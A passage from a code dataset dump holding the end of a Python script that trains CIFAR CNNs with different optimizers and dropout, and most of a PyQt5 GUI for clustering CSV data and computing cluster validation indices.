'not_set' # will be set later\n}\n\nRESULTS_FILE = \"results.txt\"\nSEED = 0\n\ndef main():\n\n    f = open(RESULTS_FILE, \"a\")\n    f.write(\"Results from \" + str(datetime.datetime.now()) + \"\\n\")\n    \n    # Load config\n    config = Config(config_default)\n\n    # Load data\n    load_data = CifarDataLoader(config)\n    train_data = load_data.get_train_data()\n    validation_data = load_data.get_test_data()\n\n    optimizers = ['adam', 'adagrad', 'sgd']\n    # optimizers = ['adam']\n\n    # Loop over multiple optimizers\n    # Without dropout\n    for optimizer in optimizers:\n\n        # Set optimizer\n        config_default['optimizer'] = optimizer\n\n        # Load config\n        config = Config(config_default)\n\n        # Create model\n        temp = ConvNet(config)\n        model = temp.get_model() # without dropout\n\n        # Train model\n        trainer = ModelTrainer(model, train_data, validation_data, config) # without dropout\n        trainer.train()\n\n        # Save trained model\n        model_name = 'cnn_' + optimizer + '.h5' # without dropout\n        save_model = os.path.join(SAVE_DIR,model_name)\n        trainer.save(save_model)\n\n        # Print the results\n        print(\"optimizer: \", optimizer)\n        print(\"Without dropout\")\n        print(\"loss: \", trainer.loss)\n        print(\"validation loss: \", trainer.val_loss)\n\n        f.write(\"optimizer: \" + optimizer + \"\\n\\n\")\n        f.write(\"Without dropout \\n\")\n        f.write(\"loss: \" + str(trainer.loss) + \"\\n\")\n        f.write(\"validation loss: \" + str(trainer.val_loss) + \"\\n\")\n        f.write(\"\\n\")\n\n    # Loop over multiple optimizers\n    # With dropout\n    for optimizer in optimizers:\n        \n        # Set optimizer\n        config_default['optimizer'] = optimizer\n\n        # Load config\n        config = Config(config_default)\n\n        # Create model\n        temp = ConvNetDropout(config)\n        model_do = temp.get_model() # with dropout\n\n        # Train model\n        trainer_do = ModelTrainer(model_do, train_data, validation_data, config) # with dropout\n        trainer_do.train()\n\n        # Save trained model\n        model_do_name = 'cnn_dropout_' + optimizer + '.h5' # with dropout\n        save_model_do = os.path.join(SAVE_DIR,model_do_name)\n        trainer_do.save(save_model_do)\n\n        # Print the results\n        print(\"optimizer: \", optimizer)\n        print(\"With dropout\")\n        print(\"loss: \", trainer_do.loss)\n        print(\"validation loss: \", trainer_do.val_loss)\n\n        f.write(\"optimizer: \" + optimizer + \"\\n\\n\")\n        f.write(\"With dropout \\n\")\n        f.write(\"loss: \" + str(trainer_do.loss) + \"\\n\")\n        
f.write(\"validation loss: \" + str(trainer_do.val_loss) + \"\\n\")\n f.write(\"\\n\")\n\n\n\n f.write(\"\\n\\n\\n\")\n f.close()\nif __name__ == '__main__':\n main()","repo_name":"juvekaradheesh/AML-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18019786272","text":"import sys\r\n\r\nfrom PyQt5 import QtWidgets, QtCore\r\nfrom PyQt5.QtWidgets import QMainWindow , QTableWidgetItem, QAction, QApplication, QMdiArea,QListWidgetItem, QListWidget, QPushButton, QHBoxLayout, QVBoxLayout, QWidget, QTableWidget,QCheckBox,QLineEdit \r\nfrom PyQt5.QtGui import QIcon\r\nimport numpy as np\r\nimport csv\r\nfrom tkinter.filedialog import askopenfilenames\r\nfrom tkinter import Tk\r\n\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nfrom sklearn.cluster import SpectralClustering\r\n\r\nfrom sklearn.metrics import silhouette_score\r\nimport internal_validation\r\n\r\nfrom fileOP import writeRows\r\nfrom resultOP import table_result\r\nfrom sklearn.metrics.cluster import normalized_mutual_info_score\r\nfrom sklearn.metrics.cluster import adjusted_rand_score\r\nfrom sklearn.metrics import jaccard_similarity_score\r\nfrom ExterValid import accuracy\r\n\r\nTk().withdraw()\r\n\r\n\r\n\r\n\r\nclass GUI(QMainWindow):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n \r\n self.data = []\r\n self.label = []\r\n self.label_b = []\r\n self.gt = []\r\n self.internal_index = []\r\n self.internal_index_b = []\r\n self.external_index = []\r\n \r\n self.data_dict = dict()\r\n self.label_dict = dict()\r\n self.label_b_dict = dict()\r\n self.gt_dict = dict()\r\n self.internal_dict = dict()\r\n self.internal_dict_b = dict()\r\n self.external_dict = dict()\r\n self.external_dict_b = dict()\r\n \r\n self.initUI()\r\n \r\n \r\n def initUI(self):\r\n self.setWindowTitle(\"Clust\") \r\n self.mdi = QMdiArea()\r\n self.setCentralWidget(self.mdi)\r\n #textEdit = QTextEdit()\r\n #self.setCentralWidget(textEdit)\r\n \r\n \r\n #Actions for View\r\n self.addDataAction = QAction(\"Add data\",self)\r\n self.addLabelAction = QAction(\"Add label\",self)\r\n self.addGTAction = QAction(\"Add ground truth\",self)\r\n self.deleteAction = QAction(\"Delete everything\", self\r\n )\r\n \r\n self.addDataAction.setShortcut('Ctrl+D')\r\n self.addDataAction.setStatusTip('Add new dataset')\r\n \r\n self.addLabelAction.setShortcut('Ctrl+L')\r\n self.addLabelAction.setStatusTip('Add new label')\r\n \r\n self.addGTAction.setShortcut('Ctrl+G')\r\n self.addGTAction.setStatusTip('Add ground truth')\r\n \r\n self.addDataAction.triggered.connect(self.addData)\r\n self.addLabelAction.triggered.connect(self.addLabel)\r\n self.addGTAction.triggered.connect(self.addGt)\r\n\r\n self.exitAction = QAction(QIcon('exit24.png'), 'Exit', self)\r\n self.exitAction.setShortcut('Ctrl+Q')\r\n self.exitAction.setStatusTip('Exit application')\r\n self.exitAction.triggered.connect(self.close)\r\n \r\n self.deleteAction.triggered.connect(self.delete)\r\n \r\n \r\n #Action for Tools\r\n \r\n self.clusterAction = QAction(\"Cluster data\", self)\r\n self.validateAction = QAction(\"Validate data\", self)\r\n self.exvalidationAction = QAction(\"External validate\", self)\r\n self.pcaAction = QAction(\"PCA plot\", self)\r\n \r\n self.clusterAction.triggered.connect(self.clusterData)\r\n self.validateAction.triggered.connect(self.internal_validate_b)\r\n 
self.exvalidationAction.triggered.connect(self.external_validate)\r\n        \r\n        self.statusBar()\r\n\r\n        self.menubar = self.menuBar()\r\n        self.fileMenu = self.menubar.addMenu('&File')\r\n        self.toolMenu = self.menubar.addMenu('&Tools')\r\n        self.fileMenu.addAction(self.addDataAction)\r\n        self.fileMenu.addAction(self.addLabelAction)\r\n        self.fileMenu.addAction(self.addGTAction)\r\n        self.fileMenu.addAction(self.exitAction)\r\n        self.fileMenu.addAction(self.deleteAction)\r\n        \r\n        #toolbar = self.addToolBar('Exit')\r\n        #toolbar.addAction(exitAction)\r\n        \r\n        self.ViewMenu = self.menubar.addMenu('&View')\r\n        self.toolMenu.addAction(self.clusterAction)\r\n        self.toolMenu.addAction(self.validateAction)\r\n        self.toolMenu.addAction(self.exvalidationAction)\r\n        \r\n        self.showDataAction = QAction(\"Show data\",self)\r\n        self.showLabelAction = QAction(\"Show label\",self)\r\n        self.showGTAction = QAction(\"Show ground truth\",self)\r\n        self.showInternalA = QAction(\"Show internal validation\", self)\r\n        self.showExternalA = QAction(\"Show external validation\", self)\r\n        \r\n        self.showDataAction.setShortcut('Ctrl+1')\r\n        self.showDataAction.setStatusTip('View datasets')\r\n        \r\n        self.showLabelAction.setShortcut('Ctrl+2')\r\n        \r\n        self.showGTAction.setShortcut('Ctrl+3')\r\n        self.showGTAction.setStatusTip('View current ground truth')\r\n        \r\n        self.showDataAction.triggered.connect(self.showData)\r\n        self.showLabelAction.triggered.connect(self.showLabel)\r\n        self.showGTAction.triggered.connect(self.showGT)\r\n        self.showInternalA.triggered.connect(self.showInternal)\r\n        self.showExternalA.triggered.connect(self.showExternal)\r\n        \r\n        self.ViewMenu.addAction(self.showDataAction)\r\n        self.ViewMenu.addAction(self.showLabelAction)\r\n        self.ViewMenu.addAction(self.showGTAction)\r\n        self.ViewMenu.addAction(self.showInternalA)\r\n        self.ViewMenu.addAction(self.showExternalA)\r\n        \r\n        \r\n        self.exportLabelAction = QAction(\"Export label\", self)\r\n        self.exportLabelAction.triggered.connect(self.exportLabel)\r\n        \r\n        self.exportInternalAction = QAction(\"Export internal\", self)\r\n        self.exportInternalAction.triggered.connect(self.exportInternal)\r\n        \r\n        self.exportExternalAction = QAction(\"Export external\", self)\r\n        self.exportExternalAction.triggered.connect(self.exportExternal)\r\n        \r\n        self.ExportMenu = self.menubar.addMenu('&Export')\r\n        self.ExportMenu.addAction(self.exportLabelAction)\r\n        self.ExportMenu.addAction(self.exportInternalAction)\r\n        self.ExportMenu.addAction(self.exportExternalAction)\r\n        \r\n        self.setGeometry(100, 100, 1200, 1000)\r\n        self.setWindowTitle('Main window')    \r\n        self.show()\r\n        \r\n    def insert_data(self, data_file_name, s):\r\n        data_name = data_file_name.split('/')[-1].split('.')[0]\r\n        data_peak = np.recfromcsv(data_file_name, delimiter = ',') # peek through data to see number of rows and cols\r\n        \r\n        num_cols = len(data_peak[0])\r\n        num_rows = len(data_peak)\r\n        \r\n        new_data = np.zeros([num_rows+1, num_cols]) # +1 because recfromcsv consumed the header row\r\n        with open(data_file_name) as csvfile:\r\n            row_index = 0\r\n            reader = csv.reader(csvfile)\r\n            for row in reader:\r\n                for cols_index in range(num_cols):\r\n                    new_data[row_index][cols_index]= row[cols_index]\r\n                row_index+=1\r\n        \r\n        if s == \"data\":\r\n            self.data.append(new_data)\r\n            self.data_dict[len(self.data)] = [data_name,num_rows,num_cols, \"Imported\"]\r\n        elif s == \"label\":\r\n            new_data = np.transpose(new_data)\r\n            \r\n            self.label_b.append(new_data)\r\n            #print(len(label_b_dict))\r\n            #print(label_b)\r\n            
self.label_b_dict[len(self.label_b_dict) + 1] = [ data_name ]\r\n        elif s == \"gt\":\r\n            self.gt.append(np.transpose(new_data))\r\n            self.gt_dict[len(self.gt)] = [data_name,num_rows,num_cols, \"Imported\"]\r\n\r\n        \r\n    def delete(self):\r\n        \r\n        self.data = []\r\n        self.label = []\r\n        self.label_b = []\r\n        self.gt = []\r\n        self.internal_index = []\r\n        self.internal_index_b = []\r\n        self.external_index = []\r\n        \r\n        self.data_dict = dict()\r\n        self.label_dict = dict()\r\n        self.label_b_dict = dict()\r\n        self.gt_dict = dict()\r\n        self.internal_dict = dict()\r\n        self.internal_dict_b = dict()\r\n        self.external_dict = dict()\r\n        self.external_dict_b = dict()\r\n        \r\n    def addData(self):\r\n        addr_list = askopenfilenames()\r\n        for i in addr_list:\r\n            self.insert_data(i, s = \"data\")\r\n        \r\n    def addLabel(self):\r\n        addr_list = askopenfilenames()\r\n        for i in addr_list:\r\n            self.insert_data(i, s = \"label\")\r\n    def addGt(self):\r\n        addr_list = askopenfilenames()\r\n        for i in addr_list:\r\n            self.insert_data(i, s = \"gt\")    \r\n    \r\n    \r\n    def showData(self):\r\n        d_view = QTableWidget()\r\n        h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n        d_view.setRowCount(len(self.data_dict))\r\n        d_view.setColumnCount(5)\r\n        d_view.setHorizontalHeaderLabels(h)\r\n        d_view.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n        d_view.setWindowTitle(\"Data view\")\r\n        for i in range(1, len(self.data_dict) + 1 ):\r\n            for c in range(5):\r\n                item = QTableWidgetItem()\r\n                if c == 0:\r\n                    item.setText(str(i))\r\n                else:\r\n                    item.setText(str(self.data_dict[i][c-1]))\r\n                item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n                d_view.setItem(i-1, c, item)\r\n        self.mdi.addSubWindow(d_view)\r\n        self.mdi.cascadeSubWindows()\r\n        d_view.show()\r\n        \r\n    def showLabel(self):\r\n        \r\n        d_view = QTableWidget()\r\n        h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n        d_view.setRowCount(len(self.label_dict))\r\n        d_view.setColumnCount(5)\r\n        d_view.setHorizontalHeaderLabels(h)\r\n        d_view.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n        d_view.setWindowTitle(\"Label view\")\r\n        for i in range(1, len(self.label_dict) + 1 ):\r\n            for c in range(5):\r\n                item = QTableWidgetItem()\r\n                if c == 0:\r\n                    item.setText(str(i))\r\n                else:\r\n                    item.setText(str(self.label_dict[i][c-1]))\r\n                item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n                d_view.setItem(i-1, c, item)\r\n        self.mdi.addSubWindow(d_view)\r\n        self.mdi.cascadeSubWindows()\r\n        d_view.show()\r\n        \r\n    def showGT(self):\r\n        d_view = QTableWidget()\r\n        h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n        d_view.setRowCount(len(self.gt_dict))\r\n        d_view.setColumnCount(5)\r\n        d_view.setHorizontalHeaderLabels(h)\r\n        d_view.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n        d_view.setWindowTitle(\"Ground truth view\")\r\n        for i in range(1, len(self.gt_dict) + 1 ):\r\n            for c in range(5):\r\n                item = QTableWidgetItem()\r\n                if c == 0:\r\n                    item.setText(str(i))\r\n                else:\r\n                    item.setText(str(self.
gt_dict[i][c-1]))\r\n                item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n                d_view.setItem(i-1, c, item)\r\n        self.mdi.addSubWindow(d_view)\r\n        self.mdi.cascadeSubWindows()\r\n        d_view.show()\r\n        \r\n        \r\n    def showInternal(self):\r\n        i_view = QTableWidget()\r\n        h = [\"Dataset\", \"Clustering algorithm\", \"Silhouette\", \"DB\", \"Xie bienie\", \"Dunn\", \"CH\", \"I\", \"SD\", \"SDb_w\", \"CVNN\" ]\r\n        i_view.setRowCount(len(self.internal_dict))\r\n        i_view.setColumnCount(11)\r\n        i_view.setHorizontalHeaderLabels(h)\r\n        i_view.setWindowTitle(\"Internal Validation view\")\r\n        for i in range(1, len(self.internal_dict) + 1 ):\r\n            for c in range(11):\r\n                item = QTableWidgetItem()\r\n                item.setText(str(self.internal_dict[i][c]))\r\n                i_view.setItem(i-1, c, item)\r\n        self.mdi.addSubWindow(i_view)\r\n        self.mdi.cascadeSubWindows()\r\n        i_view.show()\r\n        \r\n    def showExternal(self):\r\n        i_view = QTableWidget()\r\n        h = [\"Dataset\", \"Clustering algorithm\", \"NMI\", \"AR\", \"Accuracy\", \"Jaccard\" ]\r\n        i_view.setRowCount(len(self.external_dict))\r\n        i_view.setColumnCount(6)\r\n        i_view.setHorizontalHeaderLabels(h)\r\n        i_view.setWindowTitle(\"External Validation view\")\r\n        for i in range(1, len(self.external_dict) + 1 ):\r\n            for c in range(6):\r\n                item = QTableWidgetItem()\r\n                item.setText(str(self.external_dict[i][c]))\r\n                i_view.setItem(i-1, c, item)\r\n        self.mdi.addSubWindow(i_view)\r\n        self.mdi.cascadeSubWindows()\r\n        i_view.show()\r\n        \r\n    def clusterData(self):\r\n        temp = QVBoxLayout()\r\n        temp2 = QHBoxLayout()\r\n        self.clusterLayout = QWidget()\r\n        self.d_view_clust = QListWidget()\r\n        self.clust_push = QPushButton(\"Cluster\")\r\n        self.clust_push.clicked.connect(self.cluster)\r\n        \r\n#        h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n#        d_view.setRowCount(len(data))\r\n#        d_view.setColumnCount(5)\r\n#        d_view.setHorizontalHeaderLabels(h)\r\n        self.d_view_clust.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n        self.d_view_clust.setWindowTitle(\"Data view\")\r\n        for i in range(1, len(self.data_dict) + 1 ):\r\n            item = QListWidgetItem()\r\n            item.setText(str(self.data_dict[i][0]))\r\n            item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n            self.d_view_clust.addItem(item)\r\n        self.kmeans = QCheckBox(\"Kmeans\")\r\n        self.average = QCheckBox(\"Average\")\r\n        self.complete = QCheckBox(\"Complete\")\r\n        self.ward = QCheckBox(\"Ward\")\r\n        self.spectral = QCheckBox(\"Spectral\")\r\n        self.clust_text = QLineEdit()\r\n        self.clust_text.resize(280,40)\r\n        self.clust_text.setPlaceholderText(\"Number of K\")\r\n        temp2.addWidget(self.kmeans)\r\n        temp2.addWidget(self.average)\r\n        temp2.addWidget(self.complete)\r\n        temp2.addWidget(self.ward)\r\n        temp2.addWidget(self.spectral)\r\n        temp.addStretch(1)\r\n        temp.addWidget(self.d_view_clust)\r\n        temp.addLayout(temp2)\r\n        temp.addWidget(self.clust_text)\r\n        temp.addWidget(self.clust_push)\r\n        self.clusterLayout.setLayout(temp)\r\n        self.mdi.addSubWindow(self.clusterLayout)\r\n        self.mdi.cascadeSubWindows()\r\n        self.clusterLayout.show()\r\n        \r\n    def cluster(self):\r\n        selected_data = []\r\n        for i in self.d_view_clust.selectedIndexes():\r\n            selected_data.append(i.row())\r\n        if len(self.d_view_clust.selectedIndexes()) == 0:\r\n            print(\"EMPTY\")\r\n        else:\r\n            for data_i in selected_data:\r\n                if self.kmeans.isChecked():\r\n                    result = []\r\n                    for i in range(2, int(self.clust_text.text()) +1):\r\n                        estimator = KMeans(init='k-means++', n_clusters = i, n_init=10, max_iter = 1000)\r\n                        estimator.fit(self.data[data_i])\r\n                        
result.append([x + 1 for x in estimator.labels_ ])\r\n                    self.label.extend(result)\r\n                    self.label_b.append(result)\r\n                    for i in result:\r\n                        self.label_dict[len(self.label_dict) + 1] = [\"Kmeans \" + str(len(np.unique(i)))+ \" of dataset \" + (self.data_dict[data_i+1][0]), len(self.data[data_i]),1, \"ID \" + str(data_i)]\r\n                    # one label_b_dict entry per label_b entry, so the two stay aligned\r\n                    self.label_b_dict[len(self.label_b_dict) + 1] = [\"Kmeans\" + self.clust_text.text() + self.data_dict[data_i+1][0] ]\r\n                if self.average.isChecked():\r\n                    result = []\r\n                    for i in range(2, int(self.clust_text.text()) +1):\r\n                        estimator = AgglomerativeClustering(linkage='average', n_clusters = i)\r\n                        estimator.fit(self.data[data_i])\r\n                        result.append([x + 1 for x in estimator.labels_ ])\r\n                    self.label.extend(result)\r\n                    self.label_b.append(result)\r\n\r\n                    for i in result:\r\n                        self.label_dict[len(self.label_dict) + 1] = [\"Average \" + str(len(np.unique(i)))+ \" of dataset \" + (self.data_dict[data_i+1][0]) ,len(self.data[data_i]),1, \"ID \" + str(data_i) ]\r\n                    self.label_b_dict[len(self.label_b_dict) + 1] = [\"Average\" + self.clust_text.text() + self.data_dict[data_i+1][0] ]\r\n                if self.complete.isChecked():\r\n                    result = []\r\n                    for i in range(2, int(self.clust_text.text()) +1):\r\n                        estimator = AgglomerativeClustering(linkage='complete', n_clusters = i)\r\n                        estimator.fit(self.data[data_i])\r\n                        result.append([x + 1 for x in estimator.labels_ ])\r\n                    self.label.extend(result)\r\n                    self.label_b.append(result)\r\n                    for i in result:\r\n                        self.label_dict[len(self.label_dict) + 1] = [\"Complete \" + str(len(np.unique(i)))+ \" of dataset \" + (self.data_dict[data_i+1][0]) ,len(self.data[data_i]),1, \"ID \" + str(data_i) ]\r\n                    self.label_b_dict[len(self.label_b_dict) + 1] = [\"Complete\" + self.clust_text.text() + self.data_dict[data_i+1][0] ]\r\n                if self.ward.isChecked():\r\n                    result = []\r\n                    for i in range(2, int(self.clust_text.text()) +1):\r\n                        estimator = AgglomerativeClustering(linkage='ward', n_clusters = i)\r\n                        estimator.fit(self.data[data_i])\r\n                        result.append([x + 1 for x in estimator.labels_ ])\r\n                    self.label.extend(result)\r\n                    self.label_b.append(result)\r\n                    for i in result:\r\n                        self.label_dict[len(self.label_dict) + 1] = [\"Ward \" + str(len(np.unique(i)))+ \" of dataset \" + (self.data_dict[data_i+1][0]) ,len(self.data[data_i]),1, \"ID \" + str(data_i) ]\r\n                    self.label_b_dict[len(self.label_b_dict) + 1] = [\"Ward\" + self.clust_text.text() + self.data_dict[data_i+1][0] ]\r\n                if self.spectral.isChecked():\r\n                    result = []\r\n                    for i in range(2, int(self.clust_text.text()) +1):\r\n                        estimator = SpectralClustering(n_clusters = i, affinity = \"nearest_neighbors\", n_neighbors= 15, n_init = 100 )\r\n                        estimator.fit(self.data[data_i])\r\n                        result.append([x + 1 for x in estimator.labels_ ])\r\n                    self.label.extend(result)\r\n                    self.label_b.append(result)\r\n                    for i in result:\r\n                        self.label_dict[len(self.label_dict) + 1] = [\"Spectral \" + str(len(np.unique(i)))+ \" of dataset \" + (self.data_dict[data_i+1][0]) ,len(self.data[data_i]),1, \"ID \" + str(data_i) ]\r\n                    self.label_b_dict[len(self.label_b_dict) + 1] = [\"Spectral\" + self.clust_text.text() + self.data_dict[data_i+1][0] ]\r\n    \r\n    def internal_validate(self):\r\n        temp = QVBoxLayout()\r\n        temp2 = QHBoxLayout()\r\n        self.internalLayout = QWidget()\r\n        self.d_view_internal = QListWidget()\r\n        self.internal_push = QPushButton(\"Validate\")\r\n        self.internal_push.clicked.connect(self.internal)\r\n        \r\n#        h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n#        d_view.setRowCount(len(data))\r\n#        d_view.setColumnCount(5)\r\n#        
d_view.setHorizontalHeaderLabels(h)\r\n        self.d_view_internal.setWindowTitle(\"Data view\")\r\n        for i in range(1, len(self.data_dict) + 1 ):\r\n            item = QListWidgetItem()\r\n            item.setText(str(self.data_dict[i][0]))\r\n            item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n            self.d_view_internal.addItem(item)    \r\n        self.sil = QCheckBox(\"Silhouette\")\r\n        self.db = QCheckBox(\"Db\")\r\n        self.xb = QCheckBox(\"Xie_biene\")\r\n        self.dunn = QCheckBox(\"Dunn\")\r\n        self.ch = QCheckBox(\"CH\")\r\n        \r\n        temp2.addWidget(self.sil)\r\n        temp2.addWidget(self.db)\r\n        temp2.addWidget(self.xb)\r\n        temp2.addWidget(self.dunn)\r\n        temp2.addWidget(self.ch)\r\n        \r\n        temp.addStretch(1)\r\n        temp.addWidget(self.d_view_internal)\r\n        \r\n        self.l_view_internal = QListWidget()\r\n        self.l_view_internal.setWindowTitle(\"Label view\")\r\n        self.l_view_internal.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n        \r\n        \r\n        \r\n        for i in range(1, len(self.label_dict) + 1 ):\r\n            item = QListWidgetItem()\r\n            item.setText(str(self.label_dict[i][0]))\r\n            item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n            self.l_view_internal.addItem(item)\r\n        \r\n        temp.addLayout(temp2)\r\n        temp.addWidget(self.l_view_internal)\r\n        temp.addWidget(self.internal_push)\r\n        self.internalLayout.setLayout(temp)\r\n        self.mdi.addSubWindow(self.internalLayout)\r\n        self.mdi.cascadeSubWindows()\r\n        self.internalLayout.show()\r\n        \r\n    def internal(self):\r\n        data_validated = self.data[self.d_view_internal.selectedIndexes()[0].row()]\r\n        label_validated_index = []\r\n        for i in self.l_view_internal.selectedIndexes():\r\n            label_validated_index.append(i.row())\r\n        for i in label_validated_index:\r\n            result = []\r\n            label_validated = self.label[i]\r\n            num_k = np.unique(label_validated)\r\n            \r\n            inter_index = internal_validation.internalIndex(len(num_k))\r\n            \r\n            if self.sil.isChecked():\r\n                result.append(silhouette_score(data_validated, label_validated, metric = 'euclidean'))\r\n            else:\r\n                result.append(\"NA\")\r\n            if self.db.isChecked():\r\n                result.append(inter_index.dbi(data_validated, label_validated))\r\n            else:\r\n                result.append(\"NA\")\r\n            if self.xb.isChecked():\r\n                result.append(inter_index.xie_benie(data_validated, label_validated))\r\n            else:\r\n                result.append(\"NA\")\r\n            if self.dunn.isChecked():\r\n                result.append(inter_index.dunn(data_validated, label_validated))\r\n            else:\r\n                result.append(\"NA\")\r\n            if self.ch.isChecked():\r\n                result.append(inter_index.CH(data_validated, label_validated))\r\n            else:\r\n                result.append(\"NA\")\r\n            \r\n            self.internal_index.append(result)\r\n            temp = [self.data_dict[self.d_view_internal.selectedIndexes()[0].row() + 1][0], self.label_dict[i+1][0]]\r\n            \r\n            temp.extend(result)\r\n            self.internal_dict[len(self.internal_dict) + 1 ] = temp\r\n        \r\n    def internal_validate_b(self):\r\n        temp = QVBoxLayout()\r\n        temp2 = QHBoxLayout()\r\n        self.internalLayout = QWidget()\r\n        self.d_view_internal = QListWidget()\r\n        self.internal_push = QPushButton(\"Validate\")\r\n        self.internal_push.clicked.connect(self.internal_b)\r\n        \r\n#        h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n#        d_view.setRowCount(len(data))\r\n#        d_view.setColumnCount(5)\r\n#        d_view.setHorizontalHeaderLabels(h)\r\n        self.d_view_internal.setWindowTitle(\"Data view\")\r\n        for i in range(1, len(self.data_dict) + 1 ):\r\n            item = QListWidgetItem()\r\n            item.setText(str(self.data_dict[i][0]))\r\n            item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n            self.d_view_internal.addItem(item)    \r\n        self.sil 
=QCheckBox(\"Silhouette\")\r\n self.db = QCheckBox(\"Db\")\r\n self.xb = QCheckBox(\"Xie_biene\")\r\n self.dunn = QCheckBox(\"Dunn\")\r\n self.ch = QCheckBox(\"CH\")\r\n\r\n self.I = QCheckBox(\"I\")\r\n self.SD = QCheckBox(\"SD\")\r\n self.SDb_w = QCheckBox(\"SBb_w\")\r\n self.CVNN = QCheckBox(\"CVNN\")\r\n \r\n temp2.addWidget(self.sil)\r\n temp2.addWidget(self.db)\r\n temp2.addWidget(self.xb)\r\n temp2.addWidget(self.dunn)\r\n temp2.addWidget(self.ch)\r\n temp2.addWidget(self.I)\r\n temp2.addWidget(self.SD)\r\n temp2.addWidget(self.SDb_w)\r\n temp2.addWidget(self.CVNN)\r\n \r\n temp.addStretch(1)\r\n temp.addWidget(self.d_view_internal)\r\n \r\n self.l_view_internal = QListWidget()\r\n self.l_view_internal.setWindowTitle(\"Label view\")\r\n self.l_view_internal.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n \r\n \r\n \r\n for i in range(1, len(self.label_b_dict) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.label_b_dict[i][0]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.l_view_internal.addItem(item)\r\n \r\n temp.addLayout(temp2)\r\n temp.addWidget(self.l_view_internal)\r\n temp.addWidget(self.internal_push)\r\n self.internalLayout.setLayout(temp)\r\n self.mdi.addSubWindow(self.internalLayout)\r\n self.mdi.cascadeSubWindows()\r\n self.internalLayout.show()\r\n \r\n def internal_b(self):\r\n scatL = []\r\n distL = []\r\n comL = []\r\n sepL = []\r\n data_validated = self.data[self.d_view_internal.selectedIndexes()[0].row()]\r\n label_validated_index = []\r\n for i in self.l_view_internal.selectedIndexes():\r\n label_validated_index.append(i.row())\r\n for i in label_validated_index:\r\n \r\n labels_validated = self.label_b[i]\r\n result_over_k = []\r\n if self.SD.isChecked():\r\n for label_validated in labels_validated:\r\n num_k = np.unique(label_validated)\r\n inter_index = internal_validation.internalIndex(len(num_k))\r\n scat , dis = inter_index.SD_valid(data_validated, label_validated)\r\n scatL.append(scat)\r\n distL.append(dis)\r\n if self.CVNN.isChecked():\r\n for label_validated in labels_validated:\r\n num_k = np.unique(label_validated)\r\n inter_index = internal_validation.internalIndex(len(num_k))\r\n com , sep = inter_index.CVNN(data_validated, label_validated)\r\n comL.append(com)\r\n sepL.append(sep)\r\n \r\n for label_validated in labels_validated:\r\n result = []\r\n num_k = np.unique(label_validated)\r\n \r\n inter_index = internal_validation.internalIndex(len(num_k))\r\n\r\n \r\n if self.sil.isChecked():\r\n result.append(silhouette_score(data_validated, label_validated, metric = 'euclidean'))\r\n else:\r\n result.append(\"NA\")\r\n if self.db.isChecked():\r\n result.append(inter_index.dbi(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.xb.isChecked():\r\n result.append(inter_index.xie_benie(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.dunn.isChecked():\r\n result.append(inter_index.dunn(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.ch.isChecked():\r\n result.append(inter_index.CH(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.I.isChecked():\r\n result.append(inter_index.I(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.SD.isChecked():\r\n result.append(inter_index.SD_valid_n(scatL, distL))\r\n else:\r\n result.append(\"NA\")\r\n if self.SDb_w.isChecked():\r\n result.append(inter_index.SDbw(data_validated, 
label_validated))\r\n                else:\r\n                    result.append(\"NA\")\r\n                if self.CVNN.isChecked():\r\n                    result.append(inter_index.CVNN_n(comL, sepL))\r\n                else:\r\n                    result.append(\"NA\")\r\n                result_over_k.append(result)\r\n                temp = [self.data_dict[self.d_view_internal.selectedIndexes()[0].row() + 1][0], self.label_b_dict[i+1][0]+ str(len(num_k))]    \r\n                temp.extend(result)\r\n                self.internal_dict[len(self.internal_dict) + 1 ] = temp\r\n            self.internal_index.append(result_over_k)\r\n            self.internal_dict_b[len(self.internal_dict_b) + 1] = self.label_b_dict[i+1][0]\r\n        print(self.internal_index)\r\n        \r\n    def external_validate(self):\r\n        temp = QVBoxLayout()\r\n        temp2 = QHBoxLayout()\r\n        self.externalLayout = QWidget()\r\n        self.d_view_external = QListWidget()\r\n        self.external_push = QPushButton(\"Validate\")\r\n        self.external_push.clicked.connect(self.external_b)\r\n        \r\n#        h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n#        d_view.setRowCount(len(data))\r\n#        d_view.setColumnCount(5)\r\n#        d_view.setHorizontalHeaderLabels(h)\r\n        self.d_view_external.setWindowTitle(\"Data view\")\r\n        for i in range(1, 